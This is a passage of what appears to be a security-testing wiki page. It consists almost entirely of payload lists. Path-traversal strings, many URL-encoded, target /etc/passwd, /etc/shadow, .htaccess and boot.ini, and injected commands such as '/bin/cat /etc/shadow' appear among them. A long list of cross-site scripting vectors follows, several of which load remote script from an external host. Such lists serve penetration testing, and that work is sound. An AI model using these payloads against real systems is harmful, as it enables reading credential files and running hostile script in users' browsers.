%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
